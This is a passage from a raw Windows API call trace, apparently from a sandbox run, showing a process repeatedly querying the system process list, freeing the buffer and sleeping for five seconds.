Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.509] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.512] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.518] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.523] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.525] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.525] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.526] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.531] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.540] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.543] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.543] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.544] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.548] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.562] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.563] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.563] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.564] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.564] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.568] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.570] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.574] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.575] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.576] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.583] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.585] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.585] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.586] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.586] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.589] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.590] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.597] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.603] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.605] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.605] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.605] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.609] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.611] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.611] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.612] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.612] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.616] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.618] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.622] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.629] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.642] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.644] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.644] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.645] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.645] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.649] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.651] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.651] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.652] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) 